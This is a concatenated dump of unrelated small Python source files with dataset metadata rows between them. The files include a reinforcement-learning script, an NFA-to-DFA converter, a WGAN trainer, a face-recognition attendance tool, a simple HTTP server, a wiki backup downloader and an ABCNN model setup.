discounts = [gamma**1 for i in range(len(rewards) + 1)]
R = sum([a*b for a, b in zip(discounts, rewards)])
policy_loss = []
for log_prob in saved_log_probs:
policy_loss.append(-log_prob*R)
policy_loss = torch.cat(policy_loss).sum()
optimizer.zero_grad()
policy_loss.backward()
optimizer.step()
torch.save(policy.state_dict(), 'checkpoint.pth')
if i_episode % print_every == 0:
print('Episode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_deque)))
if np.mean(scores_deque)>=195.0:
print('Environment solved in {:d} episodes!\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_deque)))
break
return scores
scores = reinforce()
plt.plot(np.arange(1, len(scores)+1), scores)
plt.xlabel('Episodes')
plt.xlabel('Avg Score')
plt.savefig('graph.jpg')
plt.show()
# policy.load_state_dict(torch.load('checkpoint.pth'))
# env = gym.make('CartPole-v0')
# state = env.reset()
# for t in range(10000):
# action, _ = policy.act(state)
# env.render()
# time.sleep(0.01)
# state, reward, done, _ = env.step(action)
# if done:
# break
# env.close() | true |
e9171fdbb1b7088609290dedb5e0f4dc620b64bb | Python | mirastroie/Formal_Languages_and_Automata_Theory | /Conversion_NFA_DFA/Code.py | UTF-8 | 6,382 | 2.890625 | 3 | [] | no_license | f = open("tests.in")
def dict_index(positions,value):
for cheie, val in positions.items():
if value == val:
return cheie
def conversion():
global q0, matrix,n,m
# Step 1
# ne luam o coada in care vom avea initial doar starea initiala
Q=[q0]
# cream transition_matrix - un dictionar de forma stare_folosita : [lista de stari in care poate sa ajunga]
# astfel, primul element din lista va fi starea corespunzatoare elementului new_matrix[stare_folosita][prima litera din alfabet], al
# doilea element din lista va fi starea corespunzatoare elementului new_matrix[stare_folosita][a doua litera din alfabet], etc.
# unde consideram new_matrix noua matrice de tranzitii a dfa-ului pe care il vom obtine
transition_matrix=dict.fromkeys(Q,[])
# ne luam un alt dictionar unde vom retine daca o stare peste care dam sau pe care o cream
# a fost adaugata anterior in coada
viz=dict()
viz[q0]=1
index=0
while index<len(Q):
# pentru urmatorul element din coada, trecem prin starile prin care poate sa ajunga
for j in range(m):
if type(Q[index])==frozenset: # daca starea este compusa, atunci obtinem tranzitia sa cu caracterul j din reuniunea starilor accesibile cu caracterul j din
# toate starile componente
set_states = set()
for string_state in Q[index]:
set_states = set_states.union(set(matrix[int(string_state)][j]))
else:
set_states=set(matrix[Q[index]][j]) #daca starea nu e compusa, luam elementul ce reprezinta starea unica in care putem ajunge cu caracterul j
set_states=frozenset(set_states)
if len(set_states)==1: #daca putem ajunge intr-o singura stare
element=list(set_states)[0]
if element not in viz: # nu e in dictionarul de vizitat -> nu e in coada-> il adaug
viz[element]=1
Q.append(element)
transition_matrix[element] = [] #adaugam in dictionar starea
transition_matrix[Q[index]].append(element) #indiferent daca a fost sau nu vizitat anterior, adaug elementul
# in matricea de tranzitii in construire, in lista corespondenta elementului din coada
# luat la momentul actual in considerare
elif len(set_states)>1: #daca starea pe care o analizam este compusa
element=set()
for x in set_states:
element.add(x)
element=frozenset(element)
if element not in viz:
viz[element]=1
Q.append(element)
transition_matrix[element] = []
transition_matrix[Q[index]].append(element)
else: # nu avem nicio tranzitie corespunzatoare
transition_matrix[Q[index]].append(-1)
index=index+1
print(transition_matrix)
# Step 2 - initial and final states
new_q0=q0
global final_q
new_final_states=[]
for x in transition_matrix.keys():
# daca dam peste o stare compusa => verificam daca aceasta stare are in componenta cel putin o stare finala din automatul initial
if type(x)==frozenset:
for letter in x:
if letter in final_q:
new_final_states.append(x)
break
else:
if x in final_q:
new_final_states.append(x)
print(new_final_states)
# Step 3 - redenumirea starilor
string_states=[x for x in transition_matrix.keys() if type(x)==frozenset]
new_key=0
# pentru fiecare cheie compusa old_key, iteram prin cheile dictionarului. Daca in listele corespunzatoare
# acestor chei, gasim o stare egala cu old_key, atunci inlocuim valoarea din lista cu noul nume al starii old_key
for old_key in transition_matrix.keys():
for x in transition_matrix.keys():
for i in range(len(transition_matrix[x])):
if transition_matrix[x][i]==old_key:
transition_matrix[x][i]=new_key
# daca old_key se regaseste printre starile finale, trebuie sa ii actualizam denumirea si in aceasta lista
for i in range(len(new_final_states)):
if new_final_states[i]==old_key:
new_final_states[i]=new_key
if old_key==new_q0:
new_q0=new_key
transition_matrix[new_key] = transition_matrix.pop(old_key)
new_key=new_key+1
print(transition_matrix)
print(new_final_states)
r=open("output_dfa.txt","w")
r.write(str(len(transition_matrix.keys()))+"\n")
global alfa, position
r.write(str(m)+"\n")
for x in alfa:
r.write(x+" ")
r.write("\n")
r.write(str(new_q0)+"\n")
r.write(str(len(new_final_states))+"\n")
r.write(str(*new_final_states)+"\n")
# numaram tranzitiile
transitions=0
for x in transition_matrix.keys():
for y in transition_matrix[x]:
if y!=-1:
transitions+=1
r.write(str(transitions)+"\n")
for x in transition_matrix.keys():
for i in range(len(transition_matrix[x])):
if transition_matrix[x][i]!=-1:
r.write(str(x)+" "+str(dict_index(position,i))+" "+str(transition_matrix[x][i])+"\n")
n = int(f.readline()) # numarul de stari
m = int(f.readline()) # numarul de caractere din alfabet
linie = f.readline() # alfabetul
alfa = [x for x in linie.split()]
# cream un dictionar pentru retinerea literelor
position = {}
for i in range(m):
position[alfa[i]] = i
q0 = int(f.readline()) # starea initiala
final_states = int(f.readline()) # numarul starilor finale
linie = f.readline() # starile finale
final_q = [int(x) for x in linie.split()]
l = int(f.readline()) # numarul de translatii
matrix = [[[] for j in range(m)] for i in range(n)]
# translatiile
for i in range(l):
linie = f.readline()
t = [x for x in linie.split()]
t[0] = int(t[0])
char = t[1]
t[1] = position[char]
t[2] = int(t[2])
matrix[t[0]][t[1]].append(t[2])
for x in matrix:
print(*x)
conversion()
| true |
074f2f8361c5319b107d69f7a42a8d09549f4003 | Python | Qingyan1218/GAN | /wgan.py | UTF-8 | 4,414 | 2.75 | 3 | [] | no_license | import argparse
import os
import numpy as np
import torchvision.transforms as transforms
from torchvision.utils import save_image
from torch.utils.data import DataLoader
from torchvision import datasets
import torch
from generator import Generator
from discriminator import Discriminator
os.makedirs("images", exist_ok=True)
parser = argparse.ArgumentParser()
parser.add_argument("--n_epochs", type=int, default=200, help="number of epochs of training")
parser.add_argument("--batch_size", type=int, default=64, help="size of the batches")
parser.add_argument("--lr", type=float, default=0.0002, help="adam: learning rate")
parser.add_argument("--n_cpu", type=int, default=8, help="number of cpu threads to use during batch generation")
parser.add_argument("--latent_dim", type=int, default=100, help="dimensionality of the latent space")
parser.add_argument("--img_size", type=int, default=28, help="size of each image dimension")
parser.add_argument("--channels", type=int, default=1, help="number of image channels")
parser.add_argument("--n_critic", type=int, default=5, help="number of training steps for discriminator per iter")
parser.add_argument("--clip_value", type=float, default=0.01, help="lower and upper clip value for disc. weights")
parser.add_argument("--sample_interval", type=int, default=400, help="interval betwen image samples")
opt = parser.parse_args()
print(opt)
img_shape = (opt.channels, opt.img_size, opt.img_size)
cuda = True if torch.cuda.is_available() else False
# Initialize generator and discriminator
generator = Generator()
discriminator = Discriminator()
if cuda:
generator.cuda()
discriminator.cuda()
# Configure data loader
os.makedirs("./data/mnist", exist_ok=True)
dataloader = torch.utils.data.DataLoader(
datasets.MNIST(
"./data/mnist",
train=True,
download=True,
transform=transforms.Compose(
[transforms.Resize(opt.img_size),
transforms.ToTensor(),
transforms.Normalize([0.5], [0.5])] # [] means channel, 0.5,0.5 means mean & std
# => img = (img - mean) / 0.5 per channel
),
),
batch_size=opt.batch_size,
shuffle=True,
)
# Optimizers
optimizer_G = torch.optim.RMSprop(generator.parameters(), lr=opt.lr)
optimizer_D = torch.optim.RMSprop(discriminator.parameters(), lr=opt.lr)
Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
# ----------
# Training
# ----------
batches_done=0
for epoch in range(opt.n_epochs):
for i, (imgs, _) in enumerate(dataloader): # batch id, (image, target)
# Configure input
real_imgs = imgs.type(Tensor)
# -----------------
# Train Generator
# -----------------
optimizer_D.zero_grad() # 对已有的gradient清零(因为来了新的batch_size的image)
# Sample noise as generator input
z = Tensor(np.random.normal(0, 1, (imgs.shape[0], opt.latent_dim)))
# Generate a batch of images
fake_imgs = generator(z) # G(z) ——> D(G(z))
# Adversarial loss
loss_D = -torch.mean(discriminator(real_imgs))+torch.mean(discriminator(fake_imgs))
loss_D.backward()
optimizer_D.step()
# Clip weights of discriminator
for p in discriminator.parameters():
p.data.clamp_(-opt.clip_value,opt.clip_value)
# Train the generator every n_critic iterations
if i % opt.n_critic == 0:
# ------------
# Train generator
# ------------
optimizer_G.zero_grad()
# Generate a batch of images
gen_imgs=generator(z)
# Adversarial loss
loss_G = -torch.mean(discriminator(gen_imgs))
loss_G.backward()
optimizer_G.step()
if batches_done % 100 == 0:
print(
"[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f]"
% (epoch, opt.n_epochs, batches_done % len(dataloader), len(dataloader), loss_D.item(), loss_G.item())
)
if batches_done % opt.sample_interval == 0:
save_image(gen_imgs.data[:25], "images/%d.png" % batches_done, nrow=5, normalize=True)
batches_done +=1
| true |
371c9fb4e475f8d10ce36dd0df61e953acfcb83f | Python | Introduction-to-Programming-OSOWSKI/2-5-comparisons-ReidBarbeln2022 | /main.py | UTF-8 | 606 | 4 | 4 | [] | no_license | def greaterThan(x, y):
if x > y :
return True
else:
return False
print (greaterThan(3, 4))
def lessThan(x, y):
if x < y :
return True
else:
return False
print (lessThan(2, 3))
def equalTo(x, y):
if x == y :
return True
else:
return False
print (equalTo(3, 4))
def greaterOrEqual(x, y):
if x >= y :
return True
else:
return False
print (greaterOrEqual(3, 5))
def lessOrEqual(x, y):
if x <= y :
return True
else:
return False
print (lessOrEqual(5, 2)) | true |
f1bb4966551c3367449db77a436736af29016060 | Python | vincent-wong21/attendance-system | /FaceRecognition.py | UTF-8 | 2,071 | 2.703125 | 3 | [] | no_license | from face_recognition.face_detection_cli import image_files_in_folder
import face_recognition_knn
import cv2
import os
import attendance_window
import overlay
def face_detection(img):
cascade_path = "haarcascade_frontalface_default.xml"
face_cascade = cv2.CascadeClassifier(cascade_path)
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(img_gray, 1.1, 5)
return True if len(faces) == 1 else False
def recognize():
cap = cv2.VideoCapture(0)
temperature = 36.7
while True:
_, img = cap.read()
img = overlay.draw_overlay(img)
cv2.imshow("Face Detection", img)
face_detected = face_detection(img)
if face_detected:
print("Face Detected")
# Scaling image down by 1/4 resolution for faster face recognition
small_img = cv2.resize(img, (0,0), fx=0.25, fy=0.25)
rgb_small_img = cv2.cvtColor(small_img, cv2.COLOR_BGR2RGB)
predictions = face_recognition_knn.predict(rgb_small_img, model_path="knn_model.clf")
for name, (top, right, bottom, left) in predictions:
print("- Found {} at ({}, {})".format(name, left, top))
if predictions:
name = predictions[0][0]
present = attendance_window.check_attendance(name)
if name != "unknown" and not present:
img = overlay.draw_attendance_status(img, predictions[0][1], temperature)
cv2.imshow("Face Detection", img)
name_path = os.path.join("data/train", name)
img_path = image_files_in_folder(name_path)[0]
attendance_window.show_attendance_window(img_path, name, temperature)
if cv2.waitKey(1) & 0xFF == ord("q"):
cap.release()
cv2.destroyAllWindows()
break
if __name__ == "__main__":
print("Starting Face Recognition..")
name = recognize() | true |
6acec7ad921bcb7472587f7975c8907520287c34 | Python | hirajanwin/LeetCode-5 | /1536. Minimum Swaps to Arrange a Binary Grid/main.py | UTF-8 | 703 | 2.734375 | 3 | [
"MIT"
] | permissive | class Solution:
def minSwaps(self, grid: List[List[int]]) -> int:
m, n = len(grid), len(grid[0])
d = collections.defaultdict(int)
z = [0] * m
for i in range(m):
for j in range(n-1, -1, -1):
if grid[i][j] == 0:
z[i] += 1
else:
break
res = 0
for r in range(n-1, 0, -1):
print(z)
f = True
for i in range(len(z)):
if z[i] >= r:
res += i
z[:] = z[:i] + z[i+1:]
f = False
break
if f:
return -1
return res
| true |
2e01451943fe32a3b26b29a05f64bac6ce8e2715 | Python | MariaMedvede/coursera | /week3/QuadraticEquation-1.py | UTF-8 | 245 | 3.4375 | 3 | [] | no_license | import math
a = float(input())
b = float(input())
c = float(input())
d = b**2-4*a*c
if d > 0:
result = ((-b - math.sqrt(d))/(2*a), (-b + math.sqrt(d))/(2*a))
print(min(result), max(result))
elif d == 0:
print(-b/(2*a))
| true |
e884cea40a8a5c36b0545ba724c1b9f2bc645f8b | Python | eazapata/python | /Ejercicios python/PE7/PE7E10.py | UTF-8 | 465 | 4.34375 | 4 | [] | no_license | #Escribe un programa que te pida una palabra o número,
#pase por parámetro estos datos a una función, y ésta te
#diga si es o no palíndroma o capicúa. El programa
#principal imprimirá el resultado de la función:
resul=""
def capicua(x):
if (x==x[::-1]):
resultado=print(x,"es capicúa o palíndroma")
else:
resultado=print(x,"no es capicúa o palíndroma")
return (resultado)
valor=input("Dime algo: ")
resul=(capicua(valor))
| true |
6e0e5037e170b527b46ff4a017bcc92073c3efb1 | Python | arnavg115/nlp-api | /app.py | UTF-8 | 427 | 2.515625 | 3 | [] | no_license |
from flask import Flask, request, jsonify
import transformers
summarizer = transformers.pipeline("summarization")
app = Flask(__name__)
@app.route("/", methods=["POST"])
def main():
json:dict = request.get_json(force=True)
text = json.get("text")
res = summarizer(text,min_length=30,max_length=100) if text != None else {"error":True}
return jsonify(res)
if __name__ == "__main__":
app.run(debug=True) | true |
ae52e526c8ea1a983b7a7a6755b9f17c3db16f0c | Python | bunshue/vcs | /_4.python/__code/科班出身的AI人必修課:OpenCV影像處理/chapter22/例22.1.py | UTF-8 | 1,015 | 2.90625 | 3 | [] | no_license | import numpy as np
import cv2
from matplotlib import pyplot as plt
#随机生成两组数组
#生成60粒直径大小在[0,50]之间的xiaoMI
xiaoMI = np.random.randint(0,50,60)
#生成60粒直径大小在[200,250]之间的daMI
daMI = np.random.randint(200,250,60)
#将xiaoMI和daMI组合为MI
MI = np.hstack((xiaoMI,daMI))
#使用reshape函数将其转换为(120,1)
MI = MI.reshape((120,1))
#将MI的数据类型转换为float32
MI = np.float32(MI)
#调用kmeans模块
#设置参数criteria的值
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
#设置参数flags的值
flags = cv2.KMEANS_RANDOM_CENTERS
#调用函数kmeans
retval,bestLabels,centers = cv2.kmeans(MI,2,None,criteria,10,flags)
'''
#打印返回值
print(retval)
print(bestLabels)
print(centers)
'''
#获取分类结果
XM = MI[bestLabels==0]
DM = MI[bestLabels==1]
#绘制分类结果
#绘制原始数据
plt.plot(XM,'ro')
plt.plot(DM,'bs')
#绘制中心点
plt.plot(centers[0],'rx')
plt.plot(centers[1],'bx')
plt.show()
| true |
2fa04ff9179530e435b3447518a84d0a5149307a | Python | BrianPugh/pugh_torch | /pugh_torch/tests/datasets/test_base.py | UTF-8 | 1,078 | 2.625 | 3 | [
"MIT"
] | permissive | import pytest
from pugh_torch.datasets import Dataset
class DummyDataset(Dataset):
def __init__(self, *args, **kwargs):
pass
@pytest.fixture
def dummy(mocker, tmp_path):
mocker.patch("pugh_torch.datasets.base.ROOT_DATASET_PATH", tmp_path)
return DummyDataset()
def test_path(dummy, tmp_path):
assert dummy.path == (tmp_path / "datasets" / "DummyDataset")
def test_downloaded_file(dummy, tmp_path):
assert dummy.downloaded_file == (
tmp_path / "datasets" / "DummyDataset" / "downloaded"
)
def test_download_dataset_if_not_downloaded(mocker, dummy, tmp_path):
mock_download = mocker.patch.object(dummy, "download")
assert not dummy.downloaded
dummy._download_dataset_if_not_downloaded()
mock_download.assert_called_once()
assert dummy.downloaded
def test_unpack_dataset_if_not_unpacked(mocker, dummy, tmp_path):
mock_unpack = mocker.patch.object(dummy, "unpack")
assert not dummy.unpacked
dummy._unpack_dataset_if_not_unpacked()
mock_unpack.assert_called_once()
assert dummy.unpacked
| true |
39aae7cb203358013e08fc3cc9e0a50794862c7e | Python | Shantalai/HTTP-DNS-Client-and-Server | /HTTP/httpserver.py | UTF-8 | 3,337 | 2.890625 | 3 | [] | no_license | #! /usr/bin/env python3
# HTTP Server
# Anastasia Kaliakova ak983
# Reference
import sys
import socket
import datetime, time
import os.path
# Read server IP address and port from command-line arguments
serverIP = sys.argv[1]
serverPort = int(sys.argv[2])
dataLen = 1000000
# Create server socket TCP
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Assign IP address and port number to socket
serverSocket.bind((serverIP, serverPort))
# Listen for incoming connection requests
serverSocket.listen(1)
print('The server is ready to receive on port: ' + str(serverPort) + '\n')
while True:
# Accept incoming connection requests; allocate a new socket for data communication
connectionSocket, address = serverSocket.accept()
print("Socket created for client " + address[0] + ", " + str(address[1]))
# Receive and print the client data in bytes from "data" socket
data = connectionSocket.recv(dataLen).decode()
print("Data from client: \n" + data)
dataList = data.split('\r\n')
# Read request line of GET request
reqLine= dataList[0].split(' ')
method= reqLine[0]
objectFile= reqLine[1]
version= reqLine[2]
# Read host line of GET
# Get current time and date
ct = datetime.datetime.now(datetime.timezone.utc)
curDate = ct.strftime("%a, %d %b %Y %H:%M:%S %Z")
# Check if file exists and read in html file
HTTPresponce= ""
body = ""
statusCode= 404
statusPhr= "Not Found"
try:
with open(objectFile, "r") as myfile:
body = "".join(myfile.readlines())
bodyLen = len(body)
statusCode= 200
statusPhr= "OK"
# Get last modified date of data file
secs = os.path.getmtime(objectFile)
t = time.gmtime(secs)
file_mod_time = time.strftime("%a, %d %b %Y %H:%M:%S GMT\r\n",t)
#print("Last mod time on data file ",file_mod_time)
# Handle Conditional GET
if(len(dataList)>3):
# Read If-Modified-Since line of Conditional GET
clientDate= dataList[2][19:]+"\r\n"
#print("conditional GET date of client ",clientDate)
file_date= time.strptime(file_mod_time, "%a, %d %b %Y %H:%M:%S %Z\r\n")
client_date= time.strptime(clientDate, "%a, %d %b %Y %H:%M:%S %Z\r\n")
if(client_date<file_date):
#print("file was updated ")
HTTPresponce= version+" "+str(statusCode)+" "+statusPhr+" "+"\r\n"+"Date "+curDate+"\r\n"+"Content-Length: "+str(bodyLen)+"\r\n"+"Content-Type: text/html; charset=UTF-8\r\n"+"\r\n"+body
else:
#print("file was not updated")
statusCode= 304
statusPhr= "Not Modified"
HTTPresponce= version+" "+str(statusCode)+" "+statusPhr+" "+"\r\n"+"Date "+curDate+"\r\n"+"\r\n"
else:
HTTPresponce= version+" "+str(statusCode)+" "+statusPhr+" "+"\r\n"+"Date "+curDate+"\r\n"+"Content-Length: "+str(bodyLen)+"\r\n"+"Content-Type: text/html; charset=UTF-8\r\n"+"\r\n"+body
except IOError:
#print("File does not exists")
HTTPresponce= version+" "+str(statusCode)+" "+statusPhr+" "+"\r\n"+"Date "+curDate+"\r\n"+"Content-Length: 0"+"\r\n"+"\r\n"
# Echo back to client
connectionSocket.send(HTTPresponce.encode()) | true |
b2e782f665ad3a7c1e1d553fedf085f00ceaa078 | Python | wlowry88/ml_side_project | /scripts/load_albums.py | UTF-8 | 823 | 2.640625 | 3 | [] | no_license | import sys, os
from os.path import realpath, join, dirname
import pandas as pd
sys.path.insert(0, join(dirname(realpath(__file__)),'../'))
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ml_project.settings")
import django
django.setup()
from reviews.models import Album
def save_album_from_row(album_row):
album = Album()
album.id = album_row[0]
album.name = album_row[1]
album.save()
if __name__ == "__main__":
if len(sys.argv) == 2:
print "Reading from file " + str(sys.argv[1])
albums_df = pd.read_csv(sys.argv[1])
print albums_df
albums_df.apply(
save_album_from_row,
axis=1
)
print "There are {} albums".format(Album.objects.count())
else:
print "Please, provide Album file path"
| true |
a50176e3b2c3f4255dbb63fcf2580ee52c5ca150 | Python | NSLS-II-BMM/BMM-beamline-configuration | /wiki-backup/backup.py | UTF-8 | 2,529 | 2.671875 | 3 | [] | no_license | #!/usr/bin/env python3
import re, requests, os
def download_file(url):
local_filename = url.split('/')[-1]
# NOTE the stream=True parameter below
with requests.get(url, stream=True) as r:
r.raise_for_status()
with open(local_filename, 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
f.write(chunk)
return local_filename
urlbase = 'https://wiki-nsls2.bnl.gov/beamline6BM/index.php/'
urlsuffix = '?action=raw'
pages = list()
media = list()
top = urlbase + 'Main_Page' + urlsuffix
#####################
# grab landing page #
#####################
print(f'fetching {top}')
download_file(top)
######################
# parse landing page #
######################
with open('Main_Page' + urlsuffix) as F:
for line in F:
z = re.search('\[\[(.*)\|(.*)\]\]', line)
if z:
if re.search('^(Media|File):', z.groups()[0]):
media.append(z.groups()[0])
elif re.search('ics$', z.groups()[0]):
media.append(z.groups()[0])
else:
pages.append(z.groups()[0])
####################################
# download and parse every subpage #
####################################
for p in pages:
this = urlbase + p + urlsuffix
print(f'fetching {this}')
download_file(this)
with open(p + urlsuffix) as F:
for line in F:
z = re.search('\[\[(.*)\|(.*)\]\]', line)
if z:
if re.search('^(Media|File):', z.groups()[0]):
media.append(z.groups()[0])
elif re.search('ics$', z.groups()[0]):
media.append(z.groups()[0])
else:
continue
#if z.groups()[0] not in pages:
# pages.append(z.groups()[0])
################################
# download all the media files #
################################
for m in media:
mm = m
z = re.search('([^|]*)\|(.*)', m)
if z:
mm = z.groups()[0]
this = urlbase + mm
print(f'fetching {this}')
download_file(this)
## that was actually an HTML file, use this
## simple heuristic to find url for actual media file
with open(mm) as html:
for line in html:
z = re.search('fullMedia"><a href="([^"]*)"', line)
if z:
thing = 'https://wiki-nsls2.bnl.gov/' + z.groups()[0]
print(f'\tfetching {thing}')
download_file(thing)
os.remove(mm)
| true |
94aa6f67a9bdb8e5a15aa11fb582d88056dfbfd9 | Python | BToss/LanguageAcquisitionApp | /formant_finder.py | UTF-8 | 1,887 | 2.84375 | 3 | [] | no_license | #TODO: translate from python to java
#Step 1 Person produces vowel as input and is passed into Kiss FFT
#Step 2 is utilizing the c library Kiss FFT
#go here to get it: https://github.com/itdaniher/kissfft
#FT takes input and produces values
# AudioAnalyzer/app/src/main/jni/AudioAnalyzerHelperJNI.cpp
# The path above is to the windowing functions present in the AudioAnalyzer app. There isn't a Gaussian, but we can use their model
# to write one.
#output of 2 is passed into 3, file it as FFT result(see TODO below)
#Step 3 (The only written code currently): Extract important formants from spectra recived as output from step 2
formants_wanted = 6
#TODO: Set buffer zone to the expected width of a formant/2
buffer_zone = 1
#TODO: Replace fft_result with the input from your fft function.
fft_result = [2,9,5,5,1,8,5,8,2,6,5,9,10,9,2]
print "fft_result = " + str(fft_result)
formants =[]
for i in range(formants_wanted):
max_f = -1
max_val = -1
for f in range(len(fft_result)):
if max_val < fft_result[f]:
max_f = f
max_val = fft_result[f]
# Record max.
formants.append(max_f)
# Remove all points around the found point.
removal_index = 0
while removal_index <= 2*buffer_zone:
fft_result[max_f-buffer_zone+removal_index] = 0
removal_index += 1
print "all formants found = " + str(formants)
formants_we_care_about = sorted(formants)[1:4]
print "Formants we care about = " + str(formants_we_care_about)GH
#TODO: step 4(Bark Difference Metric): Normalizes the vowel formants so different speakers register the same vowels
#zi = (26.81/((1+1960)/Fi))-0.53 aaaaaannnnnd then the output of that, the x axis is z3-z2 and y axis is z3-z1
#Step 5 is plotting matrix on graph utilizing above
#Step 6 is synthesizing exemplar vowel measurements into "target areas" on graph (See Archetype Calculations)
| true |
9a98a30b6dc92c9f2d4754eed1fcfc81470b9f85 | Python | sebhoerl/map-matching | /06_analysis.py | UTF-8 | 1,965 | 2.8125 | 3 | [] | no_license | import numpy as np
import pickle
import matplotlib.pyplot as plt
from tqdm import tqdm
def analyze(matching, osm_data, tomtom_data, threshold, aggregator, aggregator_name):
plt.figure()
aggregated = {}
n = 0
for tomtom_id, osm_id in tqdm(matching.items()):
osm_speed = osm_data[osm_id][3]
tomtom_speed = tomtom_data[tomtom_id][3]
osm_class = osm_data[osm_id][2]
tomtom_class = tomtom_data[tomtom_id][2]
if osm_speed is not None and tomtom_speed is not None:
osm_speed = float(osm_speed)
plt.plot(osm_speed, tomtom_speed, 'kx', alpha = 0.5)
if not osm_speed in aggregated:
aggregated[osm_speed] = []
aggregated[osm_speed].append(tomtom_speed)
n += 1
aggregates = { k : aggregator(aggregated[k]) for k in aggregated }
sorted_keys = sorted(aggregates.keys())
sorted_values = [aggregates[k] for k in sorted_keys]
x = np.linspace(0, 120)
plt.plot(x, x, 'b--')
plt.errorbar(sorted_keys, sorted_values, yerr = [np.std(aggregated[k]) for k in sorted_keys], color = 'r', marker = "x")
plt.xlabel("Speed Limit [km/h]")
plt.ylabel("Average TomTom Offpeak Speed [km/h]")
plt.title("Manually matched links with speed info: %d" % n)
plt.grid()
plt.savefig("output/speeds_%s_%d.png" % (aggregator_name, threshold))
with open("output/speeds_%s_%d.p" % (aggregator_name, threshold), "wb+") as f:
pickle.dump(aggregates, f)
plt.close()
if __name__ == "__main__":
osm_data = pickle.load(open("data/osm.p", "rb"))
tomtom_data = pickle.load(open("data/tomtom.p", "rb"))
for threshold in (10, 20, 30, 40, 50, 60, 70, 80, 90, 100):
matching = pickle.load(open("data/matching_%d.p" % threshold, "rb"))
analyze(matching, osm_data, tomtom_data, threshold, np.mean, "mean")
analyze(matching, osm_data, tomtom_data, threshold, np.median, "median")
| true |
53e0bb6842119c698bd384dfc26d0123d20a7558 | Python | vishrutkmr7/DailyPracticeProblemsDIP | /2023/01 January/db01272023.py | UTF-8 | 614 | 4.09375 | 4 | [
"MIT"
] | permissive | """
Given an integer array, nums, return the total number of integers within nums that have an even number of digits.
Ex: Given the following nums…
nums = [1, 12, 123], return 1 (12 is the only integer with an even number of digits).
Ex: Given the following nums…
nums = [1, 32, 3492, 23], return 3.
"""
class Solution:
def findNumbers(self, nums: list[int]) -> int:
return len([num for num in nums if len(str(num)) % 2 == 0])
# Test Cases
if __name__ == "__main__":
solution = Solution()
print(solution.findNumbers([1, 12, 123]))
print(solution.findNumbers([1, 32, 3492, 23]))
| true |
2b3415ebe769894d19195d47c3c47f85b38a4be3 | Python | xldrx/text.mirror | /iPhone_Backup/location.py | UTF-8 | 1,662 | 2.515625 | 3 | [] | no_license | #! /usr/bin/env python -u
# coding=utf-8
from datetime import datetime
import dateutil.parser
import pytz
__author__ = 'xl'
import xml.etree.ElementTree as ET
namespaces = {
'': "http://www.opengis.net/kml/2.2",
'gx': "http://www.google.com/kml/ext/2.2",
'kml': "http://www.opengis.net/kml/2.2",
'atom': "http://www.w3.org/2005/Atom"
}
def load_history(filename="history-11-13-1982.kml"):
tree = ET.parse(filename)
root = tree.getroot()
return root
def read_locations(root):
ret = []
all = root.findall('kml:Document[1]/kml:Placemark[1]/gx:Track[1]/', namespaces=namespaces)
i = 1
while i < len(all):
position = all[i + 1].text.split(' ')
date = dateutil.parser.parse(all[i].text)
record = {
"date": date,
"location": map(float, position)
}
ret.append(record)
i += 2
return ret
def get_location(date):
global locations
try:
locations
except NameError:
locations = read_locations(load_history())
last_time = locations[0]['date']
position = None
for loc in locations_dict.get(date.date(), []):
period = (date - last_time).total_seconds() / 3600
if date > loc['date'] and period <= 4:
position = loc['location']
last_time = loc['date']
return position
def init():
global locations
global locations_dict
locations = read_locations(load_history())
locations_dict = {}
for loc in locations:
date = loc['date'].date()
locations_dict[date] = locations_dict.get(date, [])
locations_dict[date].append(loc)
init() | true |
7d170d3bb9f4ff8efceccc8e5639784fef55d749 | Python | billiecn/ABCNN | /src/setup.py | UTF-8 | 15,304 | 2.609375 | 3 | [] | no_license | # coding=utf-8
import numpy as np
import os
import pandas as pd
import re
import torch
import torch.nn as nn
import yaml
from gensim.models import KeyedVectors
from gensim.models import FastText
from nltk.corpus import stopwords
from tqdm import tqdm
from model.attention.abcnn1 import ABCNN1Attention
from model.attention.abcnn2 import ABCNN2Attention
from model.blocks.abcnn1 import ABCNN1Block
from model.blocks.abcnn2 import ABCNN2Block
from model.blocks.abcnn3 import ABCNN3Block
from model.blocks.bcnn import BCNNBlock
from model.convolution.conv import Convolution
from model.model import Model
from model.layers.layer import CNNLayer
from model.pooling.allap import AllAP
from model.pooling.widthap import WidthAP
class EmbeddingFormatError(Exception):
""" Raised when an unrecognized embedding format is specified. """
pass
class BlockTypeError(Exception):
""" Raised when an unrecognized CNN block type is specified. """
pass
def read_config(config_path):
""" Reads in the configuration file from the given path.
Args:
config_path: string
The path to the configuration file.
Returns:
config: dict
Contains the information needed to initialize the
datasets and model. See "config.json" for configuration
details.
"""
with open(config_path, "r") as stream:
config = yaml.load(stream)
return config
def setup(config):
""" Handles all of the setup needed to run an ABCNN model.
Args:
config: dict
Contains the information needed to initialize the datasets
and model.
Returns:
features: dict
Contains the feature maps for the query-query pairs in each
dataset. The keys are the names of the datasets and the values
are the Tensors storing the feature maps.
labels: dict
Contains the labels for the query-query pairs in each dataset.
The keys are the names of the datasetsa nd the values are the
labels.
model: Model
The instantiated model.
optimizer: optimizer
The optimization algorithm to use for training.
"""
features, labels, word2index = setup_datasets(config)
embeddings = setup_embeddings(config, word2index)
model = setup_model(config, embeddings)
return features, labels, model
def setup_model(config, embeddings):
""" Sets up the model for training/evaluation. The architecture here extends
on the architecture introduced in the ABCNN paper by allowing for multiple
convolutional layers with different window sizes (computed in parallel, not
in series).
Args:
config: dict
Contains the information needed to setup the model.
embeddings: nn.Embedding
The embedding matrix for the model.
Returns:
model: Model
The instantiated model.
"""
print("Creating the ABCNN model...")
# Create the layers
embeddings_size = config["embeddings"]["size"]
max_length = config["max_length"]
layer_configs = config["layers"]
use_all_layer_outputs = config["use_all_layer_outputs"]
# Initialize the layers
layers = []
layer_sizes = [embeddings_size]
for layer_config in layer_configs:
layer, layer_size = setup_layer(max_length, layer_config)
layers.append(layer)
layer_sizes.append(layer_size)
# Compute the size of the FC layer
final_size = 2 * sum(layer_sizes) if use_all_layer_outputs else 2 * layer_sizes[-1]
# Put it all together
